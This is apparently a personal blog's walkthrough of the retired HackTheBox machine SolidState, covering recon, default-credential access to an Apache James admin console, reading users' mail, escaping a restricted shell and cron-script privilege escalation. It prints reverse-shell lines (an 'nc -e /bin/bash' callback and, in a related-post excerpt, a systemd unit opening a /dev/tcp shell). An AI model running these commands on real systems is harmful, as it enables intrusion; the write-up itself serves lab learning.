Skip to main content

Hackhebox.eu - Retired - Solidstate

HacktheBox.eu - Retired - solidstate



Recon


So  I start as always with a simple UP/Down scan


nmap -T4 -p- -oX ./nmapb.xml solidstate.htb


Then I convert that to HTML to make it pretty

xsltproc ./nmapb.xml -o ./nmapb.html





Thats a goodly amount of open ports


22,25,80,110,119,4555


Let’s scan with nmap again with the -A switch to run all the scripts against those ports.


 nmap -T4 -p22,25,80,110,119,4555 -A -oX ./nmapf.xml solidstate.htb  



Then I convert that to HTML also


xsltproc ./nmapf.xml -o ./nmapf.htm




Ok we got open ssh 7.4.1 on 22 apache 2.4.25 on 80 and a bunch of stuff that says james($service) on 25,110,119 and 4555



James is a mail server for apache

https://james.apache.org/

Java Apache Mail Enterprise Server


So it makes sense to see 25(smtp), 110(pop3),119(nntp?) and 4555 which is some sort of remote admin for james



Let’s check out port 80








Exploit




Checking around for vulnerabilities in JAMES i found this


https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7


Which creates a new user and executes code the next time that user logs in…


For grins and giggles it says the james default admin is root/root


I opened telnet just to see and…




Shocked Gif Laughing GIF


Cool root/root works lets poke around starting with the help command to see what we can do.



Listusers, lets get some info





So the setpassword is interesting too. We can change the users passwords then login to their pop account and read their emails.


Here is a blog about looking at pop through the command line

https://www.shellhacks.com/retrieve-email-pop3-server-command-line/




The user Mindy was the first that had any email in it that I tested.



A welcome email and a password


Username: mindy

Pass: P@55W0rd1!2@



There also one other email in Johns mailbox






I wonder if mindy changed her password their password as instructed in the email?


Let’s see if we can ssh as mindy


Ssh mindy@solidstate.htb




Let’s see what is in Mindy’s folder?




That was quick


The Office Kevin GIF


Ok lets pivot to privilege escalation.



Ok here is the thing though mindy is stuck with a restricted shell and can’t do a lot of commands.. Like even change directory.


We need to escape out of this bash hell


Eventually I tried doing another ssh session where it ignores the profile



ssh mindy@solidstate.htb -t "bash --noprofile"



Its uglier, but at least we have some power



Poking around the os I found this in /opt



A script that belongs to root… that we have write access too :)


#!/usr/bin/env python

import os

import sys

try:

     os.system('rm -r /tmp/* ')

except:

     sys.exit()



Its just goes in an deletes everything in the /tmp folder.


I think this is running on a schedule because I’ve already seen some of my tools disappear from /tmp


So easy win here is just to change this to dump the /root/root.txt file out to the /tmp directory were we can read it..


Import os

os.system(“cat /root/root.txt > /tmp/root.xt”)



Then wait a minute for it to run



That was easy.. But let’s get a root shell too, which should be really simple 

Just modify our tmp.py


Import os

os.system(“nc -e /bin/bash 10.10.14.18 5555”)



And wait for the minute to change




And here is the job that is running tmp.py

            
            



            
Pepsi Refreshing GIF












Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The